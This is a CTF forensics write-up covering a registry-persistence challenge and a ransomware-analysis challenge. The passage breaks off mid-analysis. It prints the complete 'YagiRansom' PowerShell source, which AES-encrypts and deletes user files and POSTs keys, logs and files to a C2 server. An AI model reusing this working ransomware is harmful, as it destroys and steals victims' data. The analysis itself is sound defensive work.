# Easy Forensic

**The challenge provides a memory image and a password-protected .rar archive**
**Solution:**
* The challenge description points to persistence techniques, so I checked the places attackers commonly use to achieve persistence; after a while I found that the flag sits in the Run key of the registry:
There is a base64 string in the Run key => base64-decode it to get the password for the .rar file: `Password is {Fileless-Malware-Persistence}`
**Flag:** `ASCIS{Gh4st1n_Th3_R2M}`
# Urgent Tina
**DESCRIPTION**
```
Our client is a pessimist, she is worried that if she does not pay the ransom in the next 8 hours, the hacker will not give her any more chance to get her data back. We are trying to reassure her because we believe that our talented experts can find the cause and restore her data in less than 8 hours.
```
**This challenge provides two files: a process dump and a pcap**
**Solution:**
* I'll open both files and check them side by side:
* Starting with the dump file, I look at some basic information:
We see that this dump was taken from the update.exe process, and its command line is: `C:\Users\IEUser\Desktop\update.exe -e C:\Users\IEUser\Documents\ -s 192.168.240.1 -p 443 -x` => this is the malware used to encrypt and steal the user's data.
* Next, the pcap file:
We see data being pushed to the attacker's server at IP 192.168.240.1, port 443, which matches the process command line seen in the dump.
* At this point there are two directions: one is to somehow extract update.exe from the dump; the other is to go through the resources in the dump and look for clues about this C2.
* I tried several approaches for option 1 (including `!writemem` in WinDbg, without success), so I switched to option 2: using strings to look at the resources left in the dump when the malware ran.
* While inspecting the output I found the following useful clues:
:::spoiler
```
$RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "No files have been encrypted!" ; if (!$RansomLogs) {
DetailSequence=1
DetailTotal=1
SequenceNumber=887
UserId=ADMINISTRATOR\WIN-HO5DPB1FVND
HostName=PSRunspace-Host
HostVersion=0.5.0.29
HostId=35cf15d9-1dc0-4ed2-a642-eb6c2e8ddc1f
HostApplication=C:\Users\IEUser\Desktop\update.exe -e C:\Users\IEUser\Documents\ -s 192.168.240.1 -p 443 -x
EngineVersion=5.1.19041.1237
RunspaceId=6883aa8e-60bd-4e7e-be0b-b3927fbf6507
PipelineId=1
ScriptName=
CommandLine= $RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "No files have been encrypted!" ; if (!$RansomLogs) {
CommandInvocation(Get-Content): "Get-Content"
ParameterBinding(Get-Content): name="Path"; value="C:\Users\IEUser\Documents\\yaginote.txt"
CommandInvocation(Select-String): "Select-String"
ParameterBinding(Select-String): name="Pattern"; value="No files have been encrypted!"
ParameterBinding(Select-String): name="InputObject"; value="All your files have been encrypted by YagiRansom!!"
ParameterBinding(Select-String): name="InputObject"; value="But don't worry, you can still recover them with the recovery key if you pay the ransom in the next 8 hours."
ParameterBinding(Select-String): name="InputObject"; value="To get decryption instructions, you must transfer 100000$ to the following account:"
ParameterBinding(Select-String): name="InputObject"; value=""
ParameterBinding(Select-String): name="InputObject"; value="Account Name: Mat tran To quoc Viet Nam - Ban Cuu Tro Trung uong"
ParameterBinding(Select-String): name="InputObject"; value=""
ParameterBinding(Select-String): name="InputObject"; value="Account Number: 0011.00.1932418"
ParameterBinding(Select-String): name="InputObject"; value=""
ParameterBinding(Select-String): name="InputObject"; value="Bank: Vietnam Joint Stock Commercial Bank for Foreign Trade (Vietcombank)"
ParameterBinding(Select-String): name="InputObject"; value=""
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\13bae5d78b3351adcd58116cc58465ed.png is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\248368233_230702282385338_6224698627922749235_n.jpg is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\ad1639ada044a912032925bdc7f132c8.jpg is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\black.png is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_1.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_10.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_11.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_12.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_13.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_14.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_15.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_16.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_17.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_18.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_19.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_2.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_20.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_21.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_22.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_23.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_24.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_25.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_26.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_27.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_28.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_29.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_3.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_30.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_31.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_32.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_33.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_34.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_35.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_36.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_37.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_38.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_39.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_4.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_40.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_41.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_42.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_43.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_44.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_45.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_46.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_47.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_48.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_49.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_5.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_50.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_51.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_52.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_53.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_54.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_55.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_56.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_57.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_58.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_59.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_6.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_7.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_8.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\flag_9.txt is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\IoT_security_IoTSec_considerations_requirements_and_architectures.pdf is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\jM-z3b7f_400x400.jpg is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\mim.png is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\pexels-sebastiaan-stam-1097456.jpg is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\vietnam.jpg is now encrypted"
ParameterBinding(Select-String): name="InputObject"; value="[!] C:\Users\IEUser\Documents\z3399223868975_f9672eaf281fbf6771659ccb18692a12.jpg is now encrypted"
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
ADMINISTRATOR
foreach ($i in $(Get-ChildItem $Directory -recurse -filter *.enc | Where-Object { ! $_.PSIsContainer } | ForEach-Object { $_.FullName })) {
DetailSequence=1
DetailTotal=1
SequenceNumber=889
UserId=ADMINISTRATOR\WIN-HO5DPB1FVND
HostName=PSRunspace-Host
HostVersion=0.5.0.29
HostId=35cf15d9-1dc0-4ed2-a642-eb6c2e8ddc1f
HostApplication=C:\Users\IEUser\Desktop\update.exe -e C:\Users\IEUser\Documents\ -s 192.168.240.1 -p 443 -x
EngineVersion=5.1.19041.1237
RunspaceId=6883aa8e-60bd-4e7e-be0b-b3927fbf6507
PipelineId=1
ScriptName=
CommandLine= foreach ($i in $(Get-ChildItem $Directory -recurse -filter *.enc | Where-Object { ! $_.PSIsContainer } | ForEach-Object { $_.FullName })) {
CommandInvocation(Get-ChildItem): "Get-ChildItem"
ParameterBinding(Get-ChildItem): name="Recurse"; value="True"
ParameterBinding(Get-ChildItem): name="Filter"; value="*.enc"
ParameterBinding(Get-ChildItem): name="Path"; value="C:\Users\IEUser\Documents\"
CommandInvocation(Where-Object): "Where-Object"
ParameterBinding(Where-Object): name="FilterScript"; value=" ! $_.PSIsContainer "
CommandInvocation(ForEach-Object): "ForEach-Object"
ParameterBinding(ForEach-Object): name="Process"; value=" $_.FullName "
ParameterBinding(Where-Object): name="InputObject"; value="13bae5d78b3351adcd58116cc58465ed.png.enc"
ParameterBinding(ForEach-Object): name="InputObject"; value="13bae5d78b3351adcd58116cc58465ed.png.enc"
ParameterBinding(Where-Object): name="InputObject"; value="248368233_230702282385338_6224698627922749235_n.jpg.enc"
ParameterBinding(ForEach-Object): name="InputObject"; value="248368233_230702282385338_6224698627922749235_n.jpg.enc"
ParameterBinding(Where-Object): name="InputObject"; value="ad1639ada044a912032925bdc7f132c8.jpg.enc"
ParameterBinding(ForEach-Object): name="InputObject"; value="ad1639ada044a912032925bdc7f132c8.jpg.enc"
```
:::
The above is the information about the files in the Documents folder that were encrypted.
* After searching a good while longer, I also found the resource related to this C2: a PowerShell script:
:::spoiler
```powershell
# Design
$ProgressPreference = "SilentlyContinue"
$ErrorActionPreference = "SilentlyContinue"
$OSVersion = [Environment]::OSVersion.Platform
if ($OSVersion -like "*Win*") {
$Host.UI.RawUI.WindowTitle = "YagiRansom"
$Host.UI.RawUI.BackgroundColor = "Black"
$Host.UI.RawUI.ForegroundColor = "White" }
# Variables
$Mode = $args[0]
$Directory = $args[1]
$WiETm = $args[3]
$7CiB = $args[3]
$UFX = $args[5]
$ENyR = $args[6]
$DCe = $null
# Errors
if ($args[0] -like "-h*") { break }
if ($args[0] -eq $null) { Write-Host "[!] Not enough/Wrong parameters!" -ForegroundColor Red ; Write-Host ; break }
if ($args[1] -eq $null) { Write-Host "[!] Not enough/Wrong parameters!" -ForegroundColor Red ; Write-Host ; break }
if ($args[2] -eq $null) { Write-Host "[!] Not enough/Wrong parameters!" -ForegroundColor Red ; Write-Host ; break }
if ($args[3] -eq $null) { Write-Host "[!] Not enough/Wrong parameters!" -ForegroundColor Red ; Write-Host ; break }
# Proxy Aware
[System.Net.WebRequest]::DefaultWebProxy = [System.Net.WebRequest]::GetSystemWebProxy()
[System.Net.WebRequest]::DefaultWebProxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$AllProtocols = [System.Net.SecurityProtocolType]"Ssl3,Tls,Tls11,Tls12" ; [System.Net.ServicePointManager]::SecurityProtocol = $AllProtocols
# Functions
$OgE = ([Environment]::MachineName).ToLower() ; $zVSza = ([Environment]::UserName).ToLower() ; $I26 = "yaginote.txt"
$7VEq = Get-Date -Format "HH:mm - dd/MM/yy" ; $Uz19o = $7VEq.replace(":","").replace(" ","").replace("-","").replace("/","")+$zVSza+$OgE
if ($OSVersion -like "*Win*") { $domain = (([Environment]::UserDomainName).ToLower()+"\") ; $slash = "\" } else { $domain = $null ; $slash = "/" }
$DirectoryTarget = $Directory.Split($slash)[-1] ; if (!$DirectoryTarget) { $DirectoryTarget = $Directory.Path.Split($slash)[-1] }
function Invoke-AESEncryption {
[CmdletBinding()]
[OutputType([string])]
Param(
[Parameter(Mandatory = $true)]
[String]$Key,
[Parameter(Mandatory = $true, ParameterSetName = "CryptText")]
[String]$Text,
[Parameter(Mandatory = $true, ParameterSetName = "CryptFile")]
[String]$Path)
Begin {
$m95I = New-Object System.Security.Cryptography.SHA256Managed
$n9ibn = New-Object System.Security.Cryptography.AesManaged
$n9ibn.Mode = [System.Security.Cryptography.CipherMode]::CBC
$n9ibn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$n9ibn.BlockSize = 128
$n9ibn.KeySize = 256 }
Process {
$n9ibn.Key = $m95I.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key))
if ($Text) {$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($Text)}
if ($Path) {
$File = Get-Item -Path $Path -ErrorAction SilentlyContinue
if (!$File.FullName) { break }
$plainBytes = [System.IO.File]::ReadAllBytes($File.FullName)
$outPath = $File.FullName + ".enc" }
$encryptor = $n9ibn.CreateEncryptor()
$encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
$encryptedBytes = $n9ibn.IV + $encryptedBytes
$n9ibn.Dispose()
if ($Text) {return [System.Convert]::ToBase64String($encryptedBytes)}
if ($Path) {
[System.IO.File]::WriteAllBytes($outPath, $encryptedBytes)
(Get-Item $outPath).LastWriteTime = $File.LastWriteTime }}
End {
$m95I.Dispose()
$n9ibn.Dispose()}}
function RemoveWallpaper {
$code = @"
using System;
using System.Drawing;
using System.Runtime.InteropServices;
using Microsoft.Win32;
namespace CurrentUser { public class Desktop {
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
private static extern int SystemParametersInfo(int uAction, int uParm, string lpvParam, int fuWinIni);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern int SetSysColors(int cElements, int[] lpaElements, int[] lpRgbValues);
public const int UpdateIniFile = 0x01; public const int SendWinIniChange = 0x02;
public const int SetDesktopBackground = 0x0014; public const int COLOR_DESKTOP = 1;
public int[] first = {COLOR_DESKTOP};
public static void RemoveWallPaper(){
SystemParametersInfo( SetDesktopBackground, 0, "", SendWinIniChange | UpdateIniFile );
RegistryKey regkey = Registry.CurrentUser.OpenSubKey("Control Panel\\Desktop", true);
regkey.SetValue(@"WallPaper", 0); regkey.Close();}
public static void SetBackground(byte r, byte g, byte b){ int[] elements = {COLOR_DESKTOP};
RemoveWallPaper();
System.Drawing.Color color = System.Drawing.Color.FromArgb(r,g,b);
int[] colors = { System.Drawing.ColorTranslator.ToWin32(color) };
SetSysColors(elements.Length, elements, colors);
RegistryKey key = Registry.CurrentUser.OpenSubKey("Control Panel\\Colors", true);
key.SetValue(@"Background", string.Format("{0} {1} {2}", color.R, color.G, color.B));
key.Close();}}}
try { Add-Type -TypeDefinition $code -ReferencedAssemblies System.Drawing.dll }
finally {[CurrentUser.Desktop]::SetBackground(250, 25, 50)}}
function PopUpRansom {
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing")
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
[void] [System.Windows.Forms.Application]::EnableVisualStyles()
Invoke-WebRequest -useb https://www.mediafire.com/view/wlq9mlfrlonlcuk/yagi.png/file -Outfile $env:temp\YagiRansom.jpg
Invoke-WebRequest -useb https://www.mediafire.com/file/s4qcg4hk6bnd2pe/Yagi.ico/file -Outfile $env:temp\YagiRansom.ico
$shell = New-Object -ComObject "Shell.Application"
$shell.minimizeall()
$form = New-Object system.Windows.Forms.Form
$form.ControlBox = $false;
$form.Size = New-Object System.Drawing.Size(900,600)
$form.BackColor = "Black"
$form.MaximizeBox = $false
$form.StartPosition = "CenterScreen"
$form.WindowState = "Normal"
$form.Topmost = $true
$form.FormBorderStyle = "Fixed3D"
$form.Text = "YagiRansom"
$formIcon = New-Object system.drawing.icon ("$env:temp\YagiRansom.ico")
$form.Icon = $formicon
$img = [System.Drawing.Image]::Fromfile("$env:temp\YagiRansom.jpg")
$pictureBox = new-object Windows.Forms.PictureBox
$pictureBox.Width = 920
$pictureBox.Height = 370
$pictureBox.SizeMode = "StretchImage"
$pictureBox.Image = $img
$form.controls.add($pictureBox)
$label = New-Object System.Windows.Forms.Label
$label.ForeColor = "Cyan"
$label.Text = "All your files have been encrypted by YagiRansom!"
$label.AutoSize = $true
$label.Location = New-Object System.Drawing.Size(50,400)
$font = New-Object System.Drawing.Font("Consolas",15,[System.Drawing.FontStyle]::Bold)
$form.Font = $Font
$form.Controls.Add($label)
$label1 = New-Object System.Windows.Forms.Label
$label1.ForeColor = "White"
$label1.Text = "But don't worry, you can still recover them with the recovery key if you pay the ransom in the next 8 hours."
$label1.AutoSize = $true
$label1.Location = New-Object System.Drawing.Size(50,450)
$font1 = New-Object System.Drawing.Font("Consolas",15,[System.Drawing.FontStyle]::Bold)
$form.Font = $Font1
$form.Controls.Add($label1)
$okbutton = New-Object System.Windows.Forms.Button;
$okButton.Location = New-Object System.Drawing.Point(750,500)
$okButton.Size = New-Object System.Drawing.Size(110,35)
$okbutton.ForeColor = "Black"
$okbutton.BackColor = "White"
$okbutton.FlatStyle = [System.Windows.Forms.FlatStyle]::Flat
$okButton.Text = 'Pay Now!'
$okbutton.Visible = $false
$okbutton.Enabled = $true
$okButton.DialogResult = [System.Windows.Forms.DialogResult]::OK
$okButton.add_Click({
[System.Windows.Forms.MessageBox]::Show($this.ActiveForm, 'Your payment order has been successfully registered!', 'YagiRansom Payment Processing System',
[Windows.Forms.MessageBoxButtons]::"OK", [Windows.Forms.MessageBoxIcon]::"Warning")})
$form.AcceptButton = $okButton
$form.Controls.Add($okButton)
$form.Activate() 2>&1> $null
$form.Focus() 2>&1> $null
$btn=New-Object System.Windows.Forms.Label
$btn.Location = New-Object System.Drawing.Point(50,500)
$btn.Width = 500
$form.Controls.Add($btn)
$btn.ForeColor = "Red"
$startTime = [DateTime]::Now
$count = 10.6
$7VEqr=New-Object System.Windows.Forms.Timer
$7VEqr.add_Tick({$elapsedSeconds = ([DateTime]::Now - $startTime).TotalSeconds ; $remainingSeconds = $count - $elapsedSeconds
if ($remainingSeconds -like "-0.1*"){ $7VEqr.Stop() ; $okbutton.Visible = $true ; $btn.Text = "0 Seconds remaining.." }
$btn.Text = [String]::Format("{0} Seconds remaining..", [math]::round($remainingSeconds))})
$7VEqr.Start()
$btntest = $form.ShowDialog()
if ($btntest -like "OK"){ $Global:PayNow = "True" }}
function R64Encoder {
if ($args[0] -eq "-t") { $VaFQ = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($args[1])) }
if ($args[0] -eq "-f") { $VaFQ = [Convert]::ToBase64String([IO.File]::ReadAllBytes($args[1])) }
$VaFQ = $VaFQ.Split("=")[0] ; $VaFQ = $VaFQ.Replace("C", "-") ; $VaFQ = $VaFQ.Replace("E", "_")
$8bKW = $VaFQ.ToCharArray() ; [array]::Reverse($8bKW) ; $R64Base = -join $8bKW ; return $R64Base }
function GetStatus {
Try { Invoke-WebRequest -useb "$7CiB`:$UFX/status" -Method GET
Write-Host "[i] C2 Server is up!" -ForegroundColor Green }
Catch { Write-Host "[!] C2 Server is down!" -ForegroundColor Red }}
function SendResults {
$cvf = Invoke-AESEncryption -Key $Uz19o -Text $WiETm ; $cVl = R64Encoder -t $cvf
$2YngY = "> $cVl > $OgE > $zVSza > $7VEq"
$RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "[!]" | Select-String "YagiRansom!" -NotMatch
$XoX = R64Encoder -t $2YngY ; $B64Logs = R64Encoder -t $RansomLogs
Invoke-WebRequest -useb "$7CiB`:$UFX/data" -Method POST -Body $XoX 2>&1> $null
Invoke-WebRequest -useb "$7CiB`:$UFX/logs" -Method POST -Body $B64Logs 2>&1> $null }
function SendClose {
Invoke-WebRequest -useb "$7CiB`:$UFX/close" -Method GET 2>&1> $null }
function SendPay {
Invoke-WebRequest -useb "$7CiB`:$UFX/pay" -Method GET 2>&1> $null }
function SendOK {
Invoke-WebRequest -useb "$7CiB`:$UFX/done" -Method GET 2>&1> $null }
function CreateReadme {
$I26TXT = "All your files have been encrypted by YagiRansom!!`nBut don't worry, you can still recover them with the recovery key if you pay the ransom in the next 8 hours.`nTo get decryption instructions, you must transfer 100000$ to the following account:`n`nAccount Name: Mat tran To quoc Viet Nam - Ban Cuu Tro Trung uong`n`nAccount Number: 0011.00.1932418`n`nBank: Vietnam Joint Stock Commercial Bank for Foreign Trade (Vietcombank)`n"
if (!(Test-Path "$Directory$slash$I26")) { Add-Content -Path "$Directory$slash$I26" -Value $I26TXT }}
function EncryptFiles {
$ExcludedFiles = '*.enc', 'yaginote.txt', '*.dll', '*.ini', '*.sys', '*.exe', '*.msi', '*.NLS', '*.acm', '*.nls', '*.EXE', '*.dat', '*.efi', '*.mui'
foreach ($i in $(Get-ChildItem $Directory -recurse -exclude $ExcludedFiles | Where-Object { ! $_.PSIsContainer } | ForEach-Object { $_.FullName })) {
Invoke-AESEncryption -Key $WiETm -Path $i ; Add-Content -Path "$Directory$slash$I26" -Value "[!] $i is now encrypted" ;
Remove-Item $i }
$RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "[!]" | Select-String "YagiRansom!" -NotMatch ; if (!$RansomLogs) {
Add-Content -Path "$Directory$slash$I26" -Value "[!] No files have been encrypted!" }}
function ExfiltrateFiles {
Invoke-WebRequest -useb "$7CiB`:$UFX/files" -Method GET 2>&1> $null
$RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "No files have been encrypted!" ; if (!$RansomLogs) {
foreach ($i in $(Get-ChildItem $Directory -recurse -filter *.enc | Where-Object { ! $_.PSIsContainer } | ForEach-Object { $_.FullName })) {
$Pfile = $i.split($slash)[-1] ; $B64file = R64Encoder -f $i ; $B64Name = R64Encoder -t $Pfile
Invoke-WebRequest -useb "$7CiB`:$UFX/files/$B64Name" -Method POST -Body $B64file 2>&1> $null }}
else { $B64Name = R64Encoder -t "none.null" ; Invoke-WebRequest -useb "$7CiB`:$UFX/files/$B64Name" -Method POST -Body $B64file 2>&1> $null }}
function CheckFiles {
$RFiles = Get-ChildItem $Directory -recurse -filter *.enc ; if ($RFiles) { $RFiles } else {
Write-Host "[!] No encrypted files found!" -ForegroundColor Red }}
# Main
if ($Mode -eq "-d") {
Write-Host ; Write-Host "[!] Shutdowning...." -ForegroundColor Red; sleep 1 }
else {
Write-Host ;
Write-Host "[+] Checking communication with C2 Server.." -ForegroundColor Blue
$DCe = GetStatus ; sleep 1
$WiETm = -join ( (48..57) + (65..90) + (97..122) | Get-Random -Count 24 | % {[char]$_})
Write-Host "[!] Encrypting ..." -ForegroundColor Red
CreateReadme ; EncryptFiles ; if ($DCe) { SendResults ; sleep 1
if ($ENyR -eq "-x") { Write-Host "[i] Exfiltrating ..." -ForegroundColor Green
ExfiltrateFiles ; sleep 1 }}
if (!$DCe) { Write-Host "[+] Saving logs in yaginote.txt.." -ForegroundColor Blue }
else { Write-Host "[+] Sending logs to C2 Server.." -ForegroundColor Blue }}
if ($args -like "-demo") { RemoveWallpaper ; PopUpRansom
if ($PayNow -eq "True") { SendPay ; SendOK } else { SendClose ; SendOK }}
else { SendOK }
sleep 1000 ; Write-Host "[i] Done!" -ForegroundColor Green ; Write-Host
```
:::
Since this code looks quite complex, I'll analyze it bit by bit. Skimming through, the important functions in this C2 are: AESEncryption, R64Encoder, SendResults, EncryptFiles, ExfiltrateFiles, ...
* First I'll look at the `R64Encoder` function:
```powershell
function R64Encoder {
if ($args[0] -eq "-t") { $VaFQ = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($args[1])) }
if ($args[0] -eq "-f") { $VaFQ = [Convert]::ToBase64String([IO.File]::ReadAllBytes($args[1])) }
$VaFQ = $VaFQ.Split("=")[0] ; $VaFQ = $VaFQ.Replace("C", "-") ; $VaFQ = $VaFQ.Replace("E", "_")
$8bKW = $VaFQ.ToCharArray() ; [array]::Reverse($8bKW) ; $R64Base = -join $8bKW ; return $R64Base }
```
Before the files in the `Documents` folder are encrypted, the file data first passes through this function:
- It base64-encodes all the data, then replaces the characters as shown above, then reverses the result, and finally assigns it to `$R64Base` and returns it.
* Next I'll look at the `EncryptFiles` function to see how it encrypts files and sends them out:
```powershell
function EncryptFiles {
$ExcludedFiles = '*.enc', 'yaginote.txt', '*.dll', '*.ini', '*.sys', '*.exe', '*.msi', '*.NLS', '*.acm', '*.nls', '*.EXE', '*.dat', '*.efi', '*.mui'
foreach ($i in $(Get-ChildItem $Directory -recurse -exclude $ExcludedFiles | Where-Object { ! $_.PSIsContainer } | ForEach-Object { $_.FullName })) {
Invoke-AESEncryption -Key $WiETm -Path $i ; Add-Content -Path "$Directory$slash$I26" -Value "[!] $i is now encrypted" ;
Remove-Item $i }
$RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "[!]" | Select-String "YagiRansom!" -NotMatch ; if (!$RansomLogs) {
Add-Content -Path "$Directory$slash$I26" -Value "[!] No files have been encrypted!" }}
```
It encrypts the data with AES using the variable `$WiETm` as the key; since that variable's value is not given up front, I have to trace back through the related functions to find where its value can be obtained.
**Stage: tracing back to obtain the key needed to decrypt the data**
* I'll start from the `SendResults` function to recover the value of `$WiETm`:
```powershell
function SendResults {
$cvf = Invoke-AESEncryption -Key $Uz19o -Text $WiETm ; $cVl = R64Encoder -t $cvf
$2YngY = "> $cVl > $OgE > $zVSza > $7VEq" #$WiETm =
$RansomLogs = Get-Content "$Directory$slash$I26" | Select-String "[!]" | Select-String "YagiRansom!" -NotMatch
$XoX = R64Encoder -t $2YngY ; $B64Logs = R64Encoder -t $RansomLogs
Invoke-WebRequest -useb "$7CiB`:$UFX/data" -Method POST -Body $XoX 2>&1> $null
Invoke-WebRequest -useb "$7CiB`:$UFX/logs" -Method POST -Body $B64Logs 2>&1> $null }
```
* We see Invoke-WebRequest performing an HTTP POST to ``"$7CiB`:$UFX/data"``, where `$7CiB` is the 3rd argument of the process command line shown above, i.e. the attacker's IP.
* Correspondingly, `$UFX` is the 5th argument, port 443, and it POSTs `$XoX` to the `data` path and `$B64Logs` to the `logs` path.
* Interestingly, in the function above the key `$WiETm` is itself AES-encrypted with a different key, so to decrypt it I'll now read the pcap data to obtain the value of `$XoX`:
